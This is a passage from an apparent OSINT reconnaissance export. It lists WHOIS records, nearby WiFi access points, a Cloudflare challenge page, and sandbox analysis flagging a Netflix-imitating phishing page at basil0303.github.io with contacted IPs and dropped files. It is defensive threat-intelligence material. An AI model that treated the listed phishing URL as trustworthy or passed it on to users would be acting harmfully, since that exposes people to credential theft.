HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: o.ss2.us"- [Source: PCAP]\n Heuristic match: "crl.rootg2.amazontrust.com"- [Source: PCAP]\n Heuristic match: "GET /rootg2.crl HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: crl.rootg2.amazontrust.com"- [Source: PCAP]\n Heuristic match: "ocsp.rootg2.amazontrust.com"- [Source: PCAP]\n Heuristic match: "GET /MFQwUjBQME4wTDAJBgUrDgMCGgUABBSIfaREXmfqfJR3TkMYnD7O5MhzEgQUnF8A36oB1zArOIiiuG1KnPIRkYMCEwZ%2FlEoqJ83z%2BsKuKwH5CO65xMY%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: ocsp.rootg2.amazontrust.com"- [Source: PCAP]\n Heuristic match: "crl.rootca1.amazontrust.com"- [Source: PCAP]\n Heuristic match: "GET /rootca1.crl HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: crl.rootca1.amazontrust.com"- [Source: PCAP]\n Heuristic match: "ocsp.rootca1.amazontrust.com"- [Source: PCAP]\n Heuristic match: "GET /MFQwUjBQME4wTDAJBgUrDgMCGgUABBRPWaOUU8%2B5VZ5%2Fa9jFTaU9pkK3FAQUhBjMhTTsvAyUlC4IWZzHshBOCggCEwZ%2FlFeFh%2Bisd96yUzJbvJmLVg0%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: ocsp.rootca1.amazontrust.com"- [Source: PCAP]\n Heuristic match: "ocsp.sca1b.amazontrust.com"- [Source: PCAP]\n Heuristic match: "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQz9arGHWbnBV0DFzpNHz4YcTiFDQQUWaRmBlKge5WSPKOUByeWdFv5PdACEA11CXliCX0s5ZbPbTWItcU%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: ocsp.sca1b.amazontrust.com"- [Source: PCAP]\n Heuristic match: "crl.sca1b.amazontrust.com"- [Source: PCAP]\n Heuristic match: "GET /sca1b-1.crl HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: crl.sca1b.amazontrust.com"- [Source: PCAP]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-23', u'name': u'Sends traffic on typical HTTP outbound port, but without HTTP header', u'attck_id_ |
| 2023-05-12 02:54:16 | Web Content Type | No | Web Spider | 0 | 0 | 2 | 0 | None | text/html;charset=utf-8 | oldfluid.battleb0t.xyz |
| 2023-05-12 03:03:36 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 00root.github.io |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | ConnectionPoint (Net ID: 00:01:E3:0B:31:F9) | 50.1188, 8.6843 |
| 2023-05-12 03:28:39 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.160:443 | 188.114.96.0/24 |
| 2023-05-12 03:24:49 | Country | No | Country Name Extractor | 0 | 0 | 4 | 0 | None | United States | dontkillmyapp.com |
| 2023-05-12 03:12:12 | Co-Hosted Site - Domain Whois | No | Whois | 0 | 0 | 4 | 0 | None | Domain:
ply.gg
Domain Status:
Active
Transfer Prohibited by Registrar
Registrant:
Developed Methods LLC
Registrar:
NameCheap, Inc (https://www.namecheap.com)
Relevant dates:
Registered on 21st August 2022 at 15:10:11.713
Registry fee due on 21st August each year
Registration status:
Registered until cancelled
Name servers:
ns1.playit-dns.com
ns2.playit-dns.com
WHOIS lookup made on Fri, 12 May 2023 at 4:12:12 BST
This WHOIS information is provided for free by CIDR, operator of
the backend registry for domain names ending in GG, JE, and AS.
Copyright (c) and database right Island Networks 1996 - 2023.
You may not access this WHOIS server or use any data from it except
as permitted by our Terms and Conditions which are published
at http://www.channelisles.net/legal/whoisterms
They include restrictions and prohibitions on
- using or re-using the data for advertising;
- using or re-using the service for commercial purposes without a licence;
- repackaging, recompilation, redistribution or reuse;
- obscuring, removing or hiding any or all of this notice;
- exceeding query rate or volume limits.
The data is provided on an 'as-is' basis and may lag behind the
register. Access may be withdrawn or restricted at any time.
| ply.gg |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Capsmanagement (Net ID: 00:01:21:1C:AD:50) | 41.8781, -87.6298 |
| 2023-05-12 03:33:13 | Web Content Language | No | Language Detector | 0 | 0 | 4 | 0 | None | English | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f8c59d97743e3')"></div>
<form id="challenge-form" action="/lol.html?__cf_chl_f_tk=s7qF6ZO3cVvdEEZa_WmCMPM6sxOwT7Q8EvJA4xw7FTE-1683861861-0-gaNycGzNChA" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="IzWcLwqG74V5tV1nWv6NwCgv19x6fOKHH9bpAKGqFvs-1683861861-0-AaT1IDJ8zL-HPKAcS5jW_S_lOAZThpdmCpakWJJZLTdl-YC7YmW7x0R3Esq2ci5pRxETFrXUoScSBrwB5quPRe1171zsRq5FO5HvSBsT8wSH48d6cjZBcafhFd-gYMgKn5vz-FkJUPQ0nF10-q2ubdvcw8hKSSRUsAC4C2bgwDMz0kRykTgIN5O-4hUEH_aIMPUl85RgiecFAuvX8Ivy5H7CWHsXJNLmrFihUW3yur5y4mznmwIt6LoJGKtAduIhk1MMkrSy06zOCVQNVecBCYfPFg-LQUxzu01zND8kx6XIr4D_Z7JCVLT2xHDvC0QW8SVEpEQxyz1_6w4Q_kXekAKzWUv6f2WQc9reLDcoidSiSGME_E1JbznCGlu2Qcv2UxBiUp3ZaVMVnVkjfbD8tvqsMpOiPHRoL0QGNOvZC9IWd3DmNkLVl0o7A7gZ6X6XvmxN8FN6zQ5MuokY1veB1HzJur_7DeYGkiQKi-0P2vRxvm4WDXUmU4f2tq7Esl4HSqC16vv9LBLaBAi8Z_5ASfDKC4_Qtwk5ocpapPABdtQe_KyihhYQ0p3PsebP3qabKmLOkD2fDvF3lYLd3qMvC4RgGh-YX8l7PTUCq3wEfd8Mi9e6YReBeIzcGw5PwaoMHFYsP5RhUMwk71xYoONoQnXtJO45ecOy75oe90Gm07DUOsZsURI3qtJbwRlmpa7xW_oJhMCvGoxCaFBmv4Tj_3i4JWKOMf7hpKtp919xj-jQIAWQmSIDBw3LhMZPRePjKwSZV17PsqlmFxhMjxxo_oGcprk2tlsBrXLDx9NJVWy2DHDR-TPwL1u1-c5lRkjOzwwNIlsSIltqwOI6w4aVA6MdRM9LQlE6JVGhJTOkyMSmOGg0b-gPtNYSVQZ4M0bbvY5ZejvC-622MlBNpTcTQgj-Hr5BRzvJOQNVBtKeZNEcL0V-HlUOqjgsgCuZ0n-_DmccPSp6yXjib7zziw0VsFZ51VNwFMiyAJLSoQVd1OjGuw3fSFPRsqIT0NzkM6LJJ9oyKVkZXep7mdpjCvm52q0byqZXvzL2VDAtJAJmAXjedpHk-ixt-DqOfzQw9GqcICnOaIAwGCalMfoPOf8GPEND9RClu9LRyO_FDNt75C01Varldc5Ftwg8k-rAHBToDSA8_BQdwA01UognhxgoBkv5pTU2f0H6TbryBj0d8lUJpXsYh3CtyN0y8DOT_kz_DjrrzIT964Pdi7AsCCs8mo2IE6lrD73n8Izje7P97pkFkPjlBN2jtfhSvPURw_vpTJ5ZaaFdYA9KK-YFF68xMCw6ewAMK1rkYSoe1oqSv02a9QAvlbxHhD_COD3weHDV-tI_xq_UVBQKGO4fDKE5ZB_Li_qQJ1UU8CLWZeL01WBdYpUyqwj8DSDtW_hWLGQxeKSnHsjkNN44s8ztTjWQa0EOv111zkoc_jo1-AKbBfegf0gXFbeefPUQPApaVp0ZSh976fXDUBkg-u9zIFuO8PmOpT12qOluulzM3HAWuIXPfFdKdkuM_0Ju0J2nYUnPnIIPw7-X0VlO10ISCMaRppc2X6T6WN3Me0ur-AgpXQrtaOHERtZpzl81diItC7rlhoi2hcwlyknYz9uG6Jvt4vO7CVGEkxo64WkJUYfdQcxWDVfCj5P8OtigH5bAFPrPlThHqTc5vpPnWpu_04hxNRR1-yz89uQ30xUpmEOd55phY60kcWBwhTfKO_t_0MJs_4gMTnO_VQemTQRtnrcmjKY2pn8nAizQEc0LX-nJ_4sW5z-DGM44AAFGVM5-U7o0Y7m1jXwg99HdEmqr2iPndrQh3ksnfvVAApgCg0pbwWbA71pkVfyO8vPpUv_GruozMnSwm3sFOR28jhXLHljB6WOMjmilFX-I80iAeT78A5CMWmca6g1quxd5xHVTMFnl-Ys3ieqarC7YmJ7eytJNcbcsYSdnciNL21ndjddEi22yCTG9No7nWap74I3S-XDZ5j0YJh9aMipl2sHc0u1U-Vx2vJmPYYV1MWTS_cbbT2ub5ALyjMgyaSA96qpG_Ooy4cFCkf0E0RRynEWRVadMZE1Vz5bBogaFEOjsc334EAR0zTIX8_4nnRO5mOvEVRo4ZTcKeicbfVjehihRxW1wdSDJAbbGCjjkZj3DldP4NK0vlhWlD9UbhT6NEC6tNcCjkKUECuinurOI-oV4Cegh-51bGD-UpvxqLsfIQd9QODY03eyCxUur045Y22aLoD51JCbhy39Jp0fS35dbrG4QIggvUdxGVolRMemldY1hGoUkHPtE8nB2YB7L2z90pSQRrkz2F1mucH6C2aK0d1BE2f04Z7nAiGFk7bERb053H4pvO-fGR73M06TI9KFQDNVYHk7iyF8yJ8kA23l9FgJhokSfUX3_PYhrtNIdVilfmf2nfkSfGzPgsBbAL-1WUlksPvUQq7Tut8_2gnISEhXjovKigslLYWTdPYupiAliABg3BLe_WNuc41K408YYwipU-2SdiixQBhgUVLS8Sh615rA">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'ayhu.xyz',
cType: 'managed',
cNounce: '89417',
cRay: '7c5f8c59d97743e3',
cHash: 'd514be865123f26',
cUPMDTk: "\/lol.html?__cf_chl_tk=s7qF6ZO3cVvdEEZa_WmCMPM6sxOwT7Q8EvJA4xw7FTE-1683861861-0-gaNycGzNChA",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly9heWh1Lnh5ei9sb2wuaHRtbA==',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: 'FoAd4lVBdR3won9Rs2Jfak+tQjzXxPoSuo1RDbLWoBgbDtG4sbp6dJPVY2yPACeJPMILVDmGpWRL5p83JUdrP8nuVYCG+5vbYX8rd53MVZ5kJ9wlfWFmCqWwQJUw/8TZawBHID/u/30DQeOeSeUTm1hqzmleggywIwf6pMg+ibTI90WBrTuW9wSkueaL3qTaSW+A5NmE5a98IBe6uITwE7298cOlvN5xe0V0Y44L/7J794Ti/d2obzW0EWmpSj68DzdMrP78juCknmUCL5iCtrWXrfhdXXjruJCYgBsuVR5T1HoPLAY8ZaUH61xukMd5qVzPRfNIIlhcoowZA1Eh2PMRByvPcFpdrPeDKOY1J+M5l4lk4/TNmiDkgCFAka0tLoM1HisA+wo47P0wfWILTScPL+M3MhFjnCEsQgVWbbbcu7ppiHsxevxnn0ypjrb3lrjH9FQcH522PtO7okA/1k5zFXRELcMaZ1PaWlYYxUzZ0lEDuGD8W2uAABd3Zqr48isKkErgxdWRypRiannuzpfhTo9gXIVZgjYXWZqPwNgKEtOvG48uUqTLWAhuTpBS',
t: 'MTY4Mzg2MTg2MS40MTQwMDA=',
m: 'cETLdgv65AVfRnLUKPe0Cd6r3wJgEhjfW5wAN2YKd/o=',
i1: 'w+O5Ul3LVrlFQJyL4ELS5Q==',
i2: 'eUom9RfWfCbkQbM7K2vx8A==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'MOFk2Z71D85oDgM12X+iKPzOW00XacPzwtfsLetPJXU=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f8c59d97743e3');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f8c59d97743e3';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/lol.html?__cf_chl_rt_tk=s7qF6ZO3cVvdEEZa_WmCMPM6sxOwT7Q8EvJA4xw7FTE-1683861861-0-gaNycGzNChA" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
|
| 2023-05-12 02:44:14 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 1 | 2 | 0 | None | github.com | www.battleb0t.xyz |
| 2023-05-12 02:55:05 | Software Used | Yes | Censys | 0 | 0 | 2 | 0 | None | CloudFlare CloudFlare Load Balancer | 188.114.97.1 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | zoom1330 (Net ID: 00:01:38:92:E5:07) | 37.7813933,-122.3918002 |
| 2023-05-12 03:31:33 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | pw-55286b4dad8e2523890cab5484722bf1@privacyguardian.org | Domain Name: AAHU.XYZ
Registry Domain ID: D289905874-CNIC
Registrar WHOIS Server: whois.namesilo.com
Registrar URL: https://www.namesilo.com
Updated Date: 2022-06-06T11:23:48.0Z
Creation Date: 2022-04-10T16:51:06.0Z
Registry Expiry Date: 2024-04-10T23:59:59.0Z
Registrar: NameSilo, LLC
Registrar IANA ID: 1479
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: autoRenewPeriod https://icann.org/epp#autoRenewPeriod
Registrant Organization: See PrivacyGuardian.org
Registrant State/Province: AZ
Registrant Country: US
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: LINDA.NS.GIANTPANDA.COM
Name Server: VIVIAN.NS.GIANTPANDA.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@namesilo.com
Registrar Abuse Contact Phone: +1.4805240066
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:17:36.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: aahu.xyz
Registry Domain ID: D289905874-CNIC
Registrar WHOIS Server: whois.namesilo.com
Registrar URL: https://www.namesilo.com/
Updated Date: 2023-04-10T07:00:00Z
Creation Date: 2022-04-10T07:00:00Z
Registrar Registration Expiration Date: 2023-04-10T07:00:00Z
Registrar: NameSilo, LLC
Registrar IANA ID: 1479
Registrar Abuse Contact Email: abuse@namesilo.com
Registrar Abuse Contact Phone: +1.4805240066
Domain Status: clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: See PrivacyGuardian.org
Registrant Street: 1928 E. Highland Ave. Ste F104 PMB# 255
Registrant City: Phoenix
Registrant State/Province: AZ
Registrant Postal Code: 85016
Registrant Country: US
Registrant Phone: +1.3478717726
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: pw-55286b4dad8e2523890cab5484722bf1@privacyguardian.org
Registry Admin ID:
Admin Name: Domain Administrator
Admin Organization: See PrivacyGuardian.org
Admin Street: 1928 E. Highland Ave. Ste F104 PMB# 255
Admin City: Phoenix
Admin State/Province: AZ
Admin Postal Code: 85016
Admin Country: US
Admin Phone: +1.3478717726
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: pw-55286b4dad8e2523890cab5484722bf1@privacyguardian.org
Registry Tech ID:
Tech Name: Domain Administrator
Tech Organization: See PrivacyGuardian.org
Tech Street: 1928 E. Highland Ave. Ste F104 PMB# 255
Tech City: Phoenix
Tech State/Province: AZ
Tech Postal Code: 85016
Tech Country: US
Tech Phone: +1.3478717726
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: pw-55286b4dad8e2523890cab5484722bf1@privacyguardian.org
Name Server: hugh.ns.cloudflare.com
Name Server: ryleigh.ns.cloudflare.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-11T07:00:00Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE AND TERMS OF USE: You are not authorized to access or query our WHOIS
database through the use of high-volume, automated, electronic processes. The
Data in our WHOIS database is provided for information purposes only, and to
assist persons in obtaining information about or related to a domain name
registration record. We do not guarantee its accuracy. By submitting a WHOIS
query, you agree to abide by the following terms of use: You agree that you may
use this Data only for lawful purposes and that under no circumstances will you
use this Data to: (1) allow, enable, or otherwise support the transmission of
mass unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes that
apply to us (or our computer systems). The compilation, repackaging,
dissemination or other use of this Data is expressly prohibited without our
prior written consent. We reserve the right to terminate your access to the
WHOIS database at our sole discretion, including without limitation, for
excessive querying of the WHOIS database or for failure to otherwise abide by
this policy. We reserve the right to modify these terms at any time.
Domains - cheap, easy, and secure at NameSilo.com
https://www.namesilo.com
Register your domain now at www.NameSilo.com - Domains. Cheap, Fast and Secure
|
| 2023-05-12 02:51:26 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'https://basil0303.github.io/newnetflix', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'http://basil0303.github.io/newnetflix', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'http://basil0303.github.io/newnetflix/', u'type': u'submitted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'http://basil0303.github.io/newnetflix/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_c2c_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_c2c_ConnHashTable<3116>_HashTable_Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3116"\n "IsoScope_c2c_IESQMMUTEX_0_519"\n "IsoScope_c2c_IESQMMUTEX_0_331"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_c2c_IE_EarlyTabStart_0x890_Mutex"\n "IsoScope_c2c_IESQMMUTEX_0_303"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\ZonesCacheCounterMutex"\n "UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.108.153:80"\n "185.199.108.153:443"\n "156.146.53.12:443"\n "45.57.90.1:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"basil0303.github.io"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"assets.nflxext.com"\n "basil0303.github.io"\n "maxst.icons8.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"AAAABYjXrxZKtrzxQRVQNn2aIByoomnlbXmJ-uBy7du8a5Si3xqIsgerTlwJZG1vMpqer2kvcILy0UJQnjfRUQ5cEr7gQlYqXfxUg7bz_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced" and extension "png"\n "device-pile-in_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced" and extension "png"\n "WhatsApp%20Image%202023-01-17%20at%206.19.38%20PM_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 1280x537 components 3" and extension "jpg"\n "mobile-0819_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 640x480 components 3" and extension "jpg"\n "tv_1_.png" has type "PNG image data 640 x 480 8-bit colormap non-interlaced" and extension "png"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "AAAABYjXrxZKtrzxQRVQNn2aIByoomnlbXmJ-uBy7du8a5Si3xqIsgerTlwJZG1vMpqer2kvcILy0UJQnjfRUQ5cEr7gQlYqXfxUg7bz_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "la-solid-900_1_.eot" has type "Embedded OpenType (EOT) la-solid-900 family"- [targetUID: N/A]\n "device-pile-in_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "line-awesome.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "WhatsApp%20Image%202023-01-17%20at%206.19.38%20PM_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 1280x537 components 3"- [targetUID: N/A]\n "Cab187D.tmp" has type "data"- Location: [%TEMP%\\Cab187D.tmp]- [targetUID: 00000000-00002120]\n "mobile-0819_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 640x480 components 3"- [targetUID: N/A]\n "la-regular-400_1_.eot" has type "Embedded OpenType (EOT) la-regular-400 family"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003116]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DFEC2B4905E636D1C9.TMP" has type "data"- Location: [%TEMP%\\~DFEC2B4905E636D1C9.TMP]- [targetUID: 00000000-00003116]\n "~DF1E82426D8EB745CF.TMP" has type "data"- Location: [%TEMP%\\~DF1E82426D8EB745CF.TMP]- [targetUID: 00000000-00003116]\n "~DF00957C9CFA6C262C.TMP" has type "data"- Location: [%TEMP%\\~DF00957C9CFA6C262C.TMP]- [targetUID: 00000000-00003116]\n "~DF674FC84F11F06B63.TMP" has type "data"- Location: [%TEMP%\\~DF674FC84F11F06B63.TMP]- [targetUID: 00000000-00003116]\n "tv_1_.png" has type "PNG image data 640 x 480 8-bit colormap non-interlaced"- [targetUID: N/A]\n "urlref_httpbasil0303.github.ionewnetflix" has type "HTML document UTF-8 Unicode text"- [targetUID: N/A]\n "_66210599-EEAE-11ED-B4CC-080027622CB1_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._66210597-EEAE-11ED-B4CC-080027622CB1_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_6E36CCDE-EEAE-11ED-B4CC-080027622CB1_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "favicon_3_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "index_1_.css" has type "assembler source ASCII text"- [targetUID: N/A]\n "dberr.txt" has type "ASCII text with CRLF line terminators"- Location: [%WINDIR%\\System32\\catroot2\\dberr.txt]- [targetUID: 00000000-00002120]\n "N7NVH73N.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\N7NVH73N.txt]- [targetUID: 00000000-00003116]\n "90L3ZCW8.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\90L3ZCW8.txt]- [targetUID: 00000000-00003116]\n "4AL0ERRY.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\4AL0ERRY.txt]- [targetUID: 00000000-00003116]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002120]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "newnetflix_1_.htm" has type "HTML document ASCII text with CRLF line terminators"- [targetUID: N/A]\n "J560SO9O.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\J560SO9O.txt]- [targetUID: 00000000-00003116]\n "3ZQ8QH57.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\3ZQ8QH57.txt]- [targetUID: 00000000-00003116]\n "CTU372RB.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\CTU372RB.txt]- [targetUID: 00000000-00003116]\n "CKP14N3S.txt" has type 